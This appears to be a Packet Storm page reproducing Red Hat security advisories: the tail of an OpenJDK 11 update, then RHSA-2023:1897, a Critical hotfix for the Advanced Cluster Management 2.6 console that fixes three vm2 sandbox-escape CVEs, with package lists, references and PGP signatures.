java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsMNzjgjWX9erEAQhqvw//WhLH9EibD9Wg9khIm+puypctGFF/sImh  
pUeoQmiaLk6YDvesqljArPjZnwA/4+jeTym8jczhJV9rBV9f4/LN4l/uGBNkiWtK  
pebt8SKFVrkIYyH6zos1vyMRNe937u9SgkvCyKbSFhPmCziDy2XaA2XL6ub+YWFn  
/1CNvy9wERStSpYQMonsH0fU+Fd/bmF/R2y6X7MfUEsCllKyjlxZ1lFkEpPoGHrh  
p4hIOA8hPxPoAJ4ThVTqCSVSv01B/YBiCmR10WnoWir7wj+pU3hEbuAPQs08CnqB  
tkLk1aaE68wAh2CMcblJK66w55SpHR6cot0qNa8F7z8MX3YuVwiIBDSGlCJ6Smnu  
ON8HNdn29JZ9Kj5apdi0edaX/ZZ0lP2KdeC22DIYtNz4h7G028MwB0YR9/Sh7wlx  
f3pYVeQZlKTOsl9pTFjgRaOesHhznS1S2Fe2ClOjCP6nltvq+paRCOy8jL2ZHc9b  
/2XCt7BHbWT4vUPO0gUpuJaVOrVBFuJxBOo1kpu1g/xsw7SlcuG+nCGAyLZ0WnlK  
SftlYMUiSNViMEBg4gGBj+nPrmISyfdyCUfEkPpxqcHFhiv3u309cBKZ0fWhXl1Q  
SAlH+hZuxFAnlgw1RuNCTxW9WEIydCtj/tASL6izRPJK/BX0VRZoAQUshCB0QlWy  
C1cyOJPSxKs=  
=4BgK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1895-01

Red Hat Security Advisory 2023-1897-01 - Red Hat Advanced Cluster Management for Kubernetes hotfix security update for console. Red Hat Product Security has rated this update as having a security impact of Critical.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Advanced Cluster Management 2.6 hotfix security update for console  
Advisory ID:       RHSA-2023:1897-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1897  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-29017 CVE-2023-29199 CVE-2023-30547   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes hotfix security update  
for console

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Security Fix(es)

* CVE-2023-29017 vm2: Sandbox Escape  
* CVE-2023-29199 vm2: Sandbox Escape  
* CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied, and that you are running Red Hat  
Advanced Cluster Management for Kubernetes version 2.6.4.

See https://access.redhat.com/solutions/7007647 for instructions on how to  
apply this hotfix, as well as for information about when the hotfix has  
been  
superseded by a permanent fix and should be removed.

Important: This hotfix is a temporary fix that will be supported until 30  
days after the date when the next patch release of the product is released.  
After the 30-day period ends, you must either update to the latest patch  
release and remove this hotfix to continue receiving security updates and  
maintain support or upgrade to a newer feature release of the product.

4. Bugs fixed (https://bugzilla.redhat.com/):

2185374 - CVE-2023-29017 vm2: sandbox escape  
2187409 - CVE-2023-29199 vm2: Sandbox Escape  
2187608 - CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

5. References:

https://access.redhat.com/security/cve/CVE-2023-29017  
https://access.redhat.com/security/cve/CVE-2023-29199  
https://access.redhat.com/security/cve/CVE-2023-30547  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsK9zjgjWX9erEAQhq/w//XcdqAlO7cr2cOV5Odmp1vspNZ/fLo1y0  
QUg2SHQDuT+qM2my5bdyrPy/Mv4FbI3ibfjePG+D2+bGuL8iXFvKImyhXu7LLjhW  
I4Z/e44d+gX8Txg0TwEEKp6jmA5ErpUuyAmTvPmyYpkPW5u5cCRNNKQt4uFk9Ljd  
XVFBfBgpNe8bRls+HizXAGZbQJmoiTr8HC6QvVfCNSP9nPXXEw9U1ZavlwoijYBk  
B1RhbZ3SCuv9zIJcpkzrq6CoFbNmgqBsh2Jm9msDJP/ZwTLAJ55/Tpqy8bRLHu5G  
nqc/MUlO8CAkKYFPv+WyK6p0veGvqbHyYzfrI3IsgOMw1eo2wknraK1pgbBwrsO8  
yl5j3EyMY/ZkVJUDf3+uaSKEu5Swn3SrdsSQgAbrB3r27OozW6IFDZTwRi84QgEU  
c31Yd7CFt6HgqZRMRQY5pZ6YHmuHG8yk3bgB6d0bHL37dhWf0cYtxwGidFe1bmCH  
gFBWYstOaJgVvXxS55BnRRTINIMidLRHhJgg9YdkI4xZ9aovByPD1TnDzDARi/QT  
rl6GK6XhuYsW8ovfK4YNOfqL0Yme7Hi5xLeXQZHba/YMNpACFsMZHNehGbyBW0uj  
n04NE5CBE9EI/xedHx5C1UktPHxqFx5Okdb4WKUW/HvQGc08+rCR0Qs7tnur+2fx  
FpVrUBGLvXY=  
=mwZA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm